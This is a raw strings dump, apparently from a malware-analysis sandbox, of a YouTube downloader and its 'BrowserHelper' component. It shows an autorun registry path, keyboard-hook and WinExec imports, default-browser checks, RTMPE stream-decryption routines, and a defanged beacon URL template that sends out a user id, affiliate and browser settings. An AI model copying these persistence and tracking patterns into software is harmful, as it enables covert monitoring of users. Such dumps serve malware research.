C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelperSrv\2013_with_xp\BrowserHelperSrv.pdb

KERNEL32.dll

USER32.dll

ADVAPI32.dll

GetProcessHeap

GetCPInfo

zcÁ

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

4 5 52585>5

01S1|3

Amscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

kernel32.dll

USER32.DLL

BrowserHelper.exe

explorer.exe

Software\Microsoft\Windows\CurrentVersion\Run

e:%d s:%d

\BrowserHelper.exe

C:\PROGRA~1\YTDOWN~1\BROWSE~2.EXE

BrowserHelper.exe_1284:

.text

`.rdata

@.data

.rsrc

@.reloc

j.Yf;

_tcPVj@

.PjRW

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Higher: %x

Lower: %x

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelper\2013_with_xp\BrowserHelper.pdb

WinExec

KERNEL32.dll

SetWindowsHookExW

UnhookWindowsHookEx

USER32.dll

RegCloseKey

RegCreateKeyExW

RegEnumKeyA

RegOpenKeyExA

RegDeleteKeyW

RegEnumKeyW

RegNotifyChangeKeyValue

RegOpenKeyW

RegOpenKeyExW

ADVAPI32.dll

SHELL32.dll

ole32.dll

HttpOpenRequestW

HttpAddRequestHeadersW

HttpSendRequestW

HttpSendRequestExW

HttpEndRequestW

HttpQueryInfoW

WININET.dll

VERSION.dll

PSAPI.DLL

GetCPInfo

GetProcessHeap

zcÁ

.?AVCHttp@@

C:\PROGRA~1\YTDOWN~1\BrowserHelper.exe

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

6 6=6]6}6

?&?5?[?|?

8™9D9W9d9m9

8 8$8(8,80848

:(:4:@:`:|:

1 1$1,10141

@Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: multipart/form-data; boundary=%s

HTTP/1.1

XXX

Content-Disposition: form-data; name="%s"

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Windows 95

Windows 98

Windows Me

Windows NT

Windows 2000

Windows XP

Windows 2003 Server

Windows Vista

Windows 7

Windows CE

%sLow\%s\

%s\%s\%s\

%C:\Users\Public\Documents\%s\%s\

%s\Application Data\%s\%s\

ConfigDB.dll

config.xml

<d/d/%d d:d:d::d 0x%X>

[SbTracer::ReadConfiguration] Trace Level: %d

[SbTracer::ReadConfiguration] Trace Destination: %d

[SbTracer::ReadConfiguration] Trace Backup: %d

[SbTracer::ReadConfiguration] Trace Time Limit: %d

[SbTracer::ReadConfiguration] Trace Time Stamp: %d

[SbTracer::ReadConfiguration] Trace Max Size: %d

[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s

[SbTracer::FormatFilePath] ___Warning - No Log folder: %s

[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s

[SbTracer::FormatFilePath] Log Path: %s

[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s

[SbTracer::RecursiveCreateDirectory] Directory: %s

[SbTracer::OpenTraceFile] ___Error: %d, File: %s

[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s

[SbTracer::OpenTraceFile] Done %s

[SbTracer::BackupTraceFile] %s

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue

\StringFileInfo\x\%s

kernel32.dll

WININET.DLL

user32.dll

[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d

[CUtils::GetDAPExeLocation] Name: %s

[CUtils::GetDAPExeLocation] ___Error read DAP location from %s

PipeName

[CUtils::GetDAPPipeName] Name: %s

[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s

[CUtils::GetDAPWindowName] Name: %s

[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s

%d.%d.%d.%d

"%s" "%s"

d/d/%d d:d:d::d

"%s" %s

[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d

&exe%d=%s&ver%d=%s&arr%d=%s

&ver=%s&InstDate=%s&userid=%s&usid=%s&aff=%s&date=%s%&ch=%s&ch_pin=%s&ff=%s&ff_pin=%s&ie=%s&ie_pin=%s&in=%s&in_pin=%s&def=%s&ie2=%s&global=%s&num=%d

hXXp://hcfq9zfs.vmgoxp64.netdna-cdn.com/b.ashx?

%d-d-d

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe

0.0.0.0

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Internet.exe

%Program Files%\Internet Explorer\IEXPLORE.EXE

http\shell\open\command

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

Mozilla Firefox

Google Chrome

Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\*.lnk

explorer.exe

BrowserHelper.txt

BrowserHelperBk.txt

Chrome

Mozilla

iexplore.exe

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

%s?e=%s

zvl=%s&

1.8.1.0

Updater.exe

YTDownloader.exe_2056:

.text

`.rdata

@.data

.idata

.rsrc

@.reloc

SSShx

WSSh8

SPSSh0

WSShd

SSShX

.tMHtJH

F><.tN<[tJ<\tF<*tB<|t><^t:<$t6

Ah %S

Phh%S

FTPQ

tL<%u@

;NTu^SSh

xSSSh

FTPjKS

FtPj;S

C.PjRV

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

1.3.6.1.4.1.311.2.1.12

1.2.840.113549.1.9.5

1.2.840.113549.1.9.6

CRtmpParser::GetFieldDataString

CRtmpParser::GetFieldDataNumber

NetStream.Play.Reset

NetStream.Unpause.Notify

NetStream.Pause.Notify

NetStream.Seek.Notify

NetStream.Play.Stop

NetStream.Play.Failed

NetStream.Failed

()$^.* ?[]|\-{},:=!

video/WebM

"url_encoded_fmt_stream_map": "(.*?)"

rtmpe%3Dyes

url_encoded_fmt_stream_map=

%s, string reference, index: %d, not supported, ignoring!

%s - AMF3 unknown/unsupported datatype 0xx, @%p

AMF3_DATE reference: %d, not supported!

Property: <%s%s>

timestamp: %.2f, UTC offset: %d

INVALID TYPE 0xx

Property: <%sSTRICT_ARRAY>

Property: <%sECMA_ARRAY>

Property: <%sOBJECT>

AMF_Encode - failed to encode property in index %d

%s, invalid type. %d

%s, failed to decode AMF3 property!

Member: %s

Class name: %s, externalizable: %d, dynamic: %d, classMembers: %d

Class reference: %d

Object reference, index: %d

%s: Empty buffer/no buffer pointer!

%s - unknown datatype 0xx, @%p

AMF_TYPED_OBJECT not supported!

AMF_REFERENCE not supported!

%s: Name size out of range: namesize (%d) > len (%d) - 2

%s: Not enough data for decoding with name, less than 4 bytes!

HTTP/1

%s, Setting socket timeout to %ds failed!

%s, No SSL/TLS support

HTTP_get

If-Modified-Since: %s

GET %s HTTP/1.0

User-Agent: %s

Host: %s

Mozilla/5.0

%s, d %s %d d:d:d GMT

size: x

date: %s

ctim: %s

url: %.*s

%s: couldn't open %s for writing, errno %d (%s)

%s: couldn't contact swfurl %s (HTTP error %d)

%s: swfurl %s not found

%s: connection lost while downloading swfurl %s

1.1.4

%s%s\.swfinfo

%s: %s

hXXp://

[[IMPORT]]

No application or playpath in URL!

Invalid port number!

No hostname in URL!

Parsed protocol: %d

RTMP URL: No :// in url!

NetConnection.confStream

NetStream.Publish.Start

NetStream.Play.UnpublishNotify

NetStream.Play.PublishNotify

NetStream.Play.Complete

NetStream.Play.Start

NetConnection.Connect.InvalidApp

NetStream.Play.StreamNotFound

NetStream.Authenticate.UsherToken

Publisher password

pubPasswd

Key for SecureToken response

Justin.tv authentication token

URL to player SWF file

swfUrl

URL of played media's web page

pageUrl

URL to played stream

tcUrl

DH public key does not fulfill y^q mod p = 1

DH public key must be at most p-2

DH public key must be at least 2

RC4 In Key:

RC4 Out Key:

%s: Couldn't calculate correct DH offset (got %d), exiting!

%s: Couldn't calculate correct digest offset (got %d), exiting

%s: Couldn't calculate DH offset (got %d), exiting!

%s: Couldn't calculate digest offset (got %d), exiting!

RTMP PACKET: packet type: 0xx. channel: 0xx. info 1: %d info 2: %d. Body size: %u. body: 0xx

Connecting via SOCKS proxy: %s:%d

SWFSize : %u

live : %s

StopTime : %d msec

StartTime : %d msec

flashVer : %s

NetStream.Authenticate.UsherToken : %s

subscribepath : %s

auth : %s

pageUrl : %s

swfUrl : %s

tcUrl : %s

Playpath : %s

Port : %d

Protocol : %s

s %-7s %s

Unknown option %s

%s://%.*s:%d/%.*s

Problem accessing the DNS. (addr: %s)

%s, error

%s, Authentication failed: unknown auth mode: %s

%s, Authentication failed

%s, new app: %.*s tcUrl: %.*s playpath: %s

&nonce=%s&cnonce=%s&nc=%s&response=%s

%s, md5(%s:%s:%s:%s:%s:%s) =>

%s, md5(%s:/%.*s) =>

%s, md5(%s:%s:%s) =>

%s, pubToken1: %s

?%s&user=%s

%s, Authentication failed: no such user

%s, Authentication failed: wrong password

%s, pubToken2: %s

&challenge=%s&response=%s&opaque=%s

%s, b64(md5_2) = %s

%s, b64(%d) = %s

%s, b64(md5_1) = %s

%s, md5(%s%s%s) =>

%s, par:"%s" = val:"%s"

%s, need to set pubUser & pubPasswd for publisher auth

%s, wrong pubUser & pubPasswd for publisher auth

%-22.*s%s

%s, error decoding meta data packet

%s, received: chunk size change to %d

%s: server BW = %d

%s: client BW = %d %d

%s, recv returned %d. GetSockError(): %d (%s)

POST /%s%s/%d HTTP/1.1

Host: %.*s:%d

Content-length: %d

HTTP/1.1 200

%s, RTMP send error %d (%d bytes)

%s: fd=%d, size=%d

Invoking %s

sanity failed!! trying to send header of type: 0xx.

%s, failed to allocate packet

FCSubscribe: %s

UsherToken: %s

%s, %d, pauseTime=%d

%s, seekTime=%d, stopTime=%d, sending play: %s

sending ctrl. type: 0xx

%s: Ignoring SWFVerification request, use --swfVfy!

%s: SWFVerification Type %d request not supported! Patches welcome...

%s, SWFVerification ping received:

%s, Stream Begin %d

%s, Stream EOF %d

%s, Stream Dry %d

%s, Stream IsRecorded %d

%s, Ping %d

%s, Stream BufferEmpty %d

%s, Stream BufferReady %d

%s, Stream xx %d

%s, received ctrl. type: %d, len: %d

%s, RTMP socket closed by peer

%s, No valid HTTP response found

%s, failed to read RTMP packet body. len: %u

%s, failed to read extended timestamp

%s, failed to read RTMP packet header. type: %x

%s, m_nChannel: %0x

%s, failed to read RTMP packet header 3nd byte

%s, failed to read RTMP packet header 2nd byte

%s, failed to read RTMP packet header

%s: fd=%d

%s: client signature does not match!

%s: Handshaking finished....

%s: Genuine Adobe Flash Media Server

%s: Server not genuine Adobe!

%s: Signature calculated:

%s: Digest key:

%s: Server sent signature:

%s: Wait, did the server just refuse signed authentication?

%s: Client signature calculated:

%s: Calculated digest key from secure key and server digest:

%s: Secret key:

%s: Wrong secret key position!

%s: Server DH public key offset: %d

%s: FMS Version : %d.%d.%d.%d

%s: Server Uptime : %d

%s: Type mismatch: client sent %d, server answered %d

%s: Type Answer : X

%s: Initial client digest:

%s: Client digest offset: %d

%s: Couldn't write public key!

%s: Couldn't generate Diffie-Hellmann public key!

%s: DH pubkey position: %d

%s: Couldn't initialize Diffie-Hellmann!

%s: Client type: X

%s: Genuine Adobe Flash Player

%s: Client not genuine Adobe!

%s: Client sent signature:

%s: 2nd handshake:

%s: Sending handshake response:

%s: Server signature calculated:

%s: Client DH public key offset: %d

%s: Player Version: %d.%d.%d.%d

%s: Client Uptime : %d

%s: Initial server digest:

%s: Server digest offset: %d

%s: Unknown version x

%s: Type Requested : X

%s, RTMP connect failed.

%s, handshaked

%s, handshake failed.

%s, ... connected, handshaking

%s, Could not connect for handshake

%s, no SSL/TLS support

%s, SOCKS returned error code %d

%s, failed to create socket. Error: %d

%s, SOCKS negotiation failed.

%s ... SOCKS negotiation

%s, failed to connect socket. %d (%s)

Closing connection: %s

%s, onStatus: %s

trying to connect with redirected url

%s, error description: %s

%s, received error for method call <%s>

%s, received result id %f without matching request

%s, received result for method call <%s>

%s, server invoking <%s>

%s, error decoding invoke packet

%s, Sanity failed. no string method in invoke packet

%s, flex shared object, size %u bytes, not supported, ignoring

%s, flex message, size %u bytes, not fully supported

%s, received: notify %u bytes

%s, shared object, not supported, ignoring

%s, received: invoke %u bytes

%s, unknown packet type received: 0xx

%s, flex stream send, size %u bytes, not supported, ignoring

%s, received: bytes read report

Wrong data size (%u), stream corrupted, aborting!

Couldn't find the seeked keyframe in this chunk!

First packet does not contain keyframe, all timestamps are smaller than the keyframe timestamp; probably the resume seek failed?

FLV Stream: Keyframe doesn't match!

Found keyframe with resume-keyframe timestamp!

Checked keyframe successfully!

ignoring too small audio packet: size: %d

ignoring too small video packet: size: %d

Got Play.Complete or Play.Stop from server. Assuming stream is complete

%s: Failed to close listening socket, error %d

Caught signal: %d, cleaning up, just a second...

-c, --cert cert RTMPS cert

-k, --key key RTMPS key

-p, --port port Overrides the port in the rtmp url

%s, _beginthread failed with %d

Unknown command '%c', ignoring

-o %s

-j "%s"

-p "%s"

-W "%s"

-f "%s"

-a "%s"

-r "%s"

%s, client invoking <%s>

%s, received packet type X, size %u bytes

%s: accept failed

%s: processed request

%s: accepted connection from %s

%s, listen failed

%s, TCP bind failed for port number: %d

%s, couldn't create socket

chrome.exe iexplore.exe firefox.exe Safari.exe WebKit2WebProcess.exe opera.exe

._-$,;~()

.mpeg

video/webm

.webm

.xslt

.json

audio/x-mpegurl

.torrent

.jpeg

.shtml

.shtm

.html

url_rewrite_patterns

ssl_certificate

listening_ports

index.html,index.htm,index.cgi,index.shtml,index.php,index.lp

**.shtml$|**.shtm$

mydomain.com

**.cgi$|**.pl$|**.php$

SSL_CTX_use_certificate_chain_file

SSL_CTX_set_default_passwd_cb

SSL_CTX_use_certificate_file

SSL_CTX_use_PrivateKey_file

%s %s:

[0lu] [error] [client %s]

%.*s%s

%d-%3s-%d %d:%d:%d

%*3s, %d %3s %d %d:%d:%d

%d %3s %d %d:%d:%d

%d/%3s/%d %d:%d:%d

%[^:]:%[^:]:%s

HTTP/1.1 401 Unauthorized

WWW-Authenticate: Digest qop="auth", realm="%s", nonce="%lu"

%s:%s:%s

%s.tmp

<tr><td><a href="%s%s%s">%s%s</a></td><td> %s</td><td>  %s</td></tr>

%d-%b-%Y %H:%M

**.htpasswd$

%s%c%s

%a, %d %b %Y %H:%M:%S GMT

HTTP/

%s: CGI env buffer truncated for [%s]

HTTP_%s=%s

REMOTE_USER=%s

PERLLIB=%s

SystemDrive=%s

SYSTEMROOT=%s

COMSPEC=%s

PATH_INFO=%s

PATH=%s

CONTENT_LENGTH=%s

QUERY_STRING=%s

CONTENT_TYPE=%s

HTTPS=%s

PATH_TRANSLATED=%s

SCRIPT_FILENAME=%s

SCRIPT_NAME=%.*s%s

REQUEST_URI=%s

REMOTE_PORT=%d

REMOTE_ADDR=%s

REQUEST_METHOD=%s

SERVER_PORT=%d

SERVER_PROTOCOL=HTTP/1.1

DOCUMENT_ROOT=%s

SERVER_ROOT=%s

SERVER_NAME=%s

Cannot SSI #exec: [%s]: %s

Bad SSI #exec: [%s]

HTTP/1.1 200 OK

<d:response><d:href>%s</d:href><d:propstat><d:prop><d:resourcetype>%s</d:resourcetype><d:getcontentlength>%I64d</d:getcontentlength><d:getlastmodified>%s</d:getlastmodified></d:prop><d:status>HTTP/1.1 200 OK</d:status></d:propstat></d:response>

HTTP/1.1 207 Multi-Status

%d.%d.%d.%d%n

%d.%d.%d.%d/%d%n

%lf%c

%s/%s

boundary=™s

HTTP/1.1 302 Found

Location: hXXps://%s:%d%s

24[^:]

%d.%d.%d.%d:%d%n

Cannot add SSL socket, is -ssl_certificate option set?

%s: %.*s: invalid port spec. Expecting list of: %s

[IP_ADDRESS:]PORT[s|p]

%s: cannot bind to %.*s: %s

set_ports_option

%s - %s [%s] "%s %s HTTP/%s" %d %I64d

%d/%b/%Y:%H:%M:%S %z

%s: subnet must be [ |-]x.x.x.x[/x]

Cannot open %s: %s

calloc(): %s

connect(%s:%d): %s

socket(): %s

gethostbyname(%s): %s

%s: %s is not allowed to connect

HTTP/1.1 %d %s

Content-Length: %d

Connection: %s

Error %d: %s

%s: CreateProcess(%s): %ld

%s%s%s\%s

%.*s%c%s

.htpasswd

fopen(%s): %s

%s: cannot open %s: %s

<tr><td><a href="%s%s">%s</a></td><td> %s</td><td>  %s</td></tr>

<html><head><title>Index of %s</title><style>th {text-align: left;}</style></head><body><h1>Index of %s</h1><pre><table cellpadding="0"><tr><th><a href="?n%c">Name</a></th><th><a href="?d%c">Modified</a></th><th><a href="?s%c">Size</a></th></tr><tr><td colspan="3"><hr></td></tr>

Error: opendir(%s): %s

Date: %s

Last-Modified: %s

Etag: %s

HTTP/1.1 100 Continue

Cannot create CGI pipe: %s

fopen: %s

CGI program sent malformed or too big (>%u bytes) HTTP headers: [%.*s]

Cannot spawn CGI process [%s]: %s

put_dir(%s): %s

HTTP/1.1 %d OK

Bad SSI #include: [%s]

Cannot open SSI #include: [%s]: fopen(%s): %s

%s: SSI tag is too large

%s: unknown SSI command: "%s"

SSI #include level is too deep (%s)

Method %s is not implemented

HTTP/1.1 301 Moved Permanently

Location: %s/

remove(%s): %s

Bad HTTP version

Bad HTTP version: [%s]

Invalid URI: [%s]

%s: option value cannot be NULL

Invalid option: %s

warning: %s: duplicate option

Hello from mongoose! Remote port: %d

HttpSendRequestW failed with error code

HttpOpenRequestW failed with error code

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

1.2.5

inflate 1.2.5 Copyright 1995-2010 Mark Adler

Visual C   CRT: Not enough memory to complete call to strerror.

cmd.exe

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

operator

GetProcessWindowStation

C:\BUILDS\Build_YTDownloader\Client\WFP\exe\RemoteRelease\YTDownloader.pdb

.?AVCHttp@@

<>"#{}|\^~[]`' ?&

.?AVCRtmpe@@

.?AV?$IBaseInterface@VIKeysBank@@@@

.?AVIKeysBank@@

.?AV?$CBaseInterface@VCKeysBank@@VIKeysBank@@@@

.?AVCKeysBank@@

.?AVCRtmpDataProperty@@

.?AVCRtmpPacket@@

.?AVCRtmpParser@@

.?AVChromeBrowserWindow@@

.?AVFirefoxBrowserWindow@@

.?AVOperaBrowserWindow@@

HTTP://

.?AVHttpParser@@

.?AVCHttpDownload@@

zcÁ

WinExec

CreatePipe

KERNEL32.dll

MsgWaitForMultipleObjectsEx

EnumChildWindows

USER32.dll

GDI32.dll

RegCloseKey

RegCreateKeyExW

RegEnumKeyA

RegOpenKeyExA

RegOpenKeyExW

RegDeleteKeyW

RegOpenKeyW

RegEnumKeyW

RegNotifyChangeKeyValue

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ShellExecuteExW

ShellExecuteW

SHELL32.dll

ole32.dll

OLEAUT32.dll

COMCTL32.dll

WS2_32.dll

LIBEAY32.dll

HttpEndRequestW

HttpQueryInfoW

HttpSendRequestW

HttpSendRequestExW

HttpAddRequestHeadersW

HttpOpenRequestW

WININET.dll

VERSION.dll

CertGetNameStringW

CertFreeCertificateContext

CryptMsgClose

CertCloseStore

CertFindCertificateInStore

CryptMsgGetParam

CRYPT32.dll

PSAPI.DLL

IsValidURL

urlmon.dll

GdiplusShutdown

gdiplus.dll

GetCPInfo

GetProcessHeap

nnn%XXX

pppaSSS

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

<assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>

4c6c6v6

4(4-4`4)5

>.?5?;?]?

9 9$9(9,9

00C0Y0

4B4f4

3"3(373@3

: :$:(:,:0:4:8:<:

?"?(?-?3?

:":):6:?:]:

2<3i3 4<4_;

6$6(6,6064686<6

5$50585`5

>$>0>8>`>

2 2(242`2

8$80888`8

? ?$?(?,?

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

HTTP/1.1

Content-Disposition: form-data; name="%s"

XXX

Content-Type: multipart/form-data; boundary=%s

Windows CE

Windows 7

Windows Vista

Windows 2003 Server

Windows XP

Windows 2000

Windows NT

Windows Me

Windows 98

Windows 95

%sLow\%s\

%C:\Users\Public\Documents\%s\%s\

%s\%s\%s\

%s\Application Data\%s\%s\

[CEventsThread::SetTimeoutResolution] From: %d -> To: %d

[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms

[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms

[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d

[CEventsThread::WaitForMultipleEvents] TID=%X

[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d

[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d

[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...

[CEventsThread::Start - Leave] TID=%X

[CEventsThread::Start] ___Error - Failed to create thread: %X

[CEventsThread::Stop - Leave] TID=%X

[CEventsThread::Stop - Enter] TID=%X

[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d

[CEventsThread::AlertEvent] ___Error SetEvent failed: %d

[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d

[CEventsThread::AlertEvent] ___Error Not found Event: %d

[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d

[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d

[CEventsThread::SetGlobalEvent] Event: %d

[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d

[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d

[CEventsThread::ResetEvent] ___Error Not found Event: %d

[CEventsThread::ResetEvent] Event: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d

[CEventsThread::WaitEvent] TID=%X

[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d

[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] ___Error Not found Event: %d

[CEventsThread::RemoveEvent] Event: %d

[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d

[CEventsThread::Cleanup] Closing Handle: %d

[CEventsThread::Work] TID=%X - Exit !!!

[CEventsThread::Work] WAIT_ABANDONED - %d

[CEventsThread::Work] TID=%X

[CEventsThread::AddEvent] ___Warning event handle already exists %d

[CEventsThread::AddEvent] ___Error invalid event handle %d

ConfigDB.dll

config.xml

%%X

<d/d/%d d:d:d::d 0x%X>

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx

[SbTracer::RecursiveCreateDirectory] Directory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s

[SbTracer::FormatFilePath] Log Path: %s

[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s

[SbTracer::FormatFilePath] ___Warning - No Log folder: %s

[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s

\StringFileInfo\x\%s

[SbTracer::ReadConfiguration] Trace Max Size: %d

[SbTracer::ReadConfiguration] Trace Time Stamp: %d

[SbTracer::ReadConfiguration] Trace Time Limit: %d

[SbTracer::ReadConfiguration] Trace Backup: %d

[SbTracer::ReadConfiguration] Trace Destination: %d

[SbTracer::ReadConfiguration] Trace Level: %d

[SbTracer::BackupTraceFile] %s

[SbTracer::OpenTraceFile] Done %s

[SbTracer::OpenTraceFile] ___Error: %d, File: %s

[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s

CertGetNameString failed.

CryptDecodeObject failed with %x

CertFindCertificateInStore failed with %x

MoreInfo Link : %s

Publisher Link : %s

Program Name : %s

CryptMsgGetParam failed with %x

CryptQueryObject failed with %x

user32.dll

WININET.DLL

kernel32.dll

d/d/%d d:d:d::d

%d.%d.%d.%d

[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d

"%s" "%s"

"%s" %s

[CUtils::GetDAPExeLocation] ___Error read DAP location from %s

[CUtils::GetDAPExeLocation] Name: %s

[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s

[CUtils::GetDAPPipeName] Name: %s

PipeName

[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s

[CUtils::GetDAPWindowName] Name: %s

[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d

[CClientRtmpe::HandShake] ___Error DiffieHellman - GetPublicKey

[CClientRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key

[CClientRtmpe::operator =] Key Out: %p

[CClientRtmpe::operator =] Key In:

[CClientRtmpe::operator =]

[CClientRtmpe::OnHandshake] Step 3 - update the keystreams

[CClientRtmpe::OnHandshake] ___Error Step 3 - ___Error ComputeSharedSecretKey

[CClientRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey

[CClientRtmpe::OnHandshake] Step 2 - Client version: %x

[CClientRtmpe::OnHandshake] Step 2 - Client up time: %d

[CClientRtmpe::OnHandshake] Step 2 - Protocol: %d

[CKeysBank::Work] Exit...

[CKeysBank::Work] Enter...

[CKeysBank::Start]

[CKeysBank::Stop]

[CKeysBank::GetPublicKey] Remove Key, Total: %d

[CKeysBank::GenerateKey] Add Key, Total: %d

[CKeysBank::GenerateKey] ___Error DiffieHellman.GenerateKey

[CKeysBank::GenerateKey] ___Error DiffieHellman.Init

[CRtmpe::operator =] Key Out: %p

[CRtmpe::operator =] Key In:

[CRtmpe::operator =]

[CRtmpe::Initialize] Cache Writer: %p

[CRtmpe::ParseHeader] Protocol - RTMPE

[CRtmpe::ParseHeader] Protocol - RTMP

[CRtmpe::ParseHeader]

[CRtmpe::ParseData] Got all %d/%d bytes

[CRtmpe::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)

[CRtmpe::ParseData]

[CRtmpe::Encrypt] Encryped %d bytes, Key: %p

[CRtmpe::Decrypt] Decrypted %d bytes, Key: %p

[CRtmpe::ParseBuffer] Analyze Next Packet...

[CRtmpe::HandShake] Step 1: Complete

[CRtmpe::HandShake] ___Error Step 1: Writing client signature to server

[CRtmpe::HandShake] ___Error Step 1: DiffieHellman - GetPublicKey

[CRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key

[CRtmpe::HandShake] Step 1: Start...

[CRtmpe::UpdateBuffer] Analyzed %d/%d bytes

[CRtmpe::UpdateBuffer] Handshake already completed

[CRtmpe::UpdateBuffer] Analyzing %d bytes...

[CRtmpStream::OnHandShake] ___Error - Unknown step

[CRtmpe::OnHandshake] Step 3 - Complete

[CRtmpe::OnHandshake] Step 3 - update the keystreams

[CRtmpe::OnHandshake] Step 3 - InitRC4Encryption

[CRtmpe::OnHandshake] ___Error Step 3: m_DiffieHellman - ComputeSharedSecretKey

[CRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey

[CRtmpe::OnHandshake] ___Error Step 3: Writing client response

[CRtmpe::OnHandshake] Step 3: Start...

[CRtmpe::OnHandshake] ___Error Step 2: *** Server response validation ***

[CRtmpe::OnHandshake] ___Warning - server version

[CRtmpe::OnHandshake] ___Error Step 2: Reading server response

[CRtmpe::OnHandshake] ___Error Step 2: *** Server signature validation ***

[CRtmpe::OnHandshake] Step 2 - Server version: %x

[CRtmpe::OnHandshake] Step 2 - Server up time: %d

[CRtmpe::OnHandshake] ___Error Step 2: Reading server signature

[CRtmpe::OnHandshake] Step 2 - Protocol: %d

[CRtmpe::OnHandshake] Step 2: Start...

[CRtmpPacket::Reset]

[CRtmpPacket::DumpHeader] Info Field: %d

[CRtmpPacket::DumpHeader] Packet Type: %d

[CRtmpPacket::DumpHeader] Packet Length: %d

[CRtmpPacket::DumpHeader] Absolute Time: %d

[CRtmpPacket::DumpHeader] Time: %d

[CRtmpPacket::DumpHeader] Channel: %d

[CRtmpPacket::DumpHeader] Header Type: %d

[CRtmpPacket::DumpHeader] Header Size: %d

[CRtmpPacket::DumpHeader] Header Byte: 0x%.02X

[CRtmpPacket::ParseHandshakeHeader] ___Error - Header already parsed

[CRtmpPacket::ParseFlvHeader] Absolute Time: %d

[CRtmpPacket::ParseFlvHeader] Packet Length: %d

[CRtmpPacket::ParseFlvHeader] Packet Type: %d

[CRtmpPacket::ParseFlvHeader] Channel: %d

[CRtmpPacket::ParseFlvHeader] Header Type: %d

[CRtmpPacket::ParseFlvHeader] Header Size: %d

[CRtmpPacket::ParseFlvHeader] ___Warning - %d/%d header bytes

[CRtmpPacket::ParseFlvHeader] ___Error - No bytes to analyze

[CRtmpPacket::ParseFlvHeader] ___Error - Header already parsed

[CRtmpPacket::AppendData] Appended: %d (Total: %d/%d)

[CRtmpPacket::AppendData] ___Error - out of memory

[CRtmpPacket::AppendData] ___Warning - no bytes to append

[CRtmpPacket::Allocate] Allocated %d (Total: %d)

[CRtmpPacket::ParseHeader] ___Error - Channel: %d > 9

[CRtmpPacket::ParseHeader] Extended Time: %d

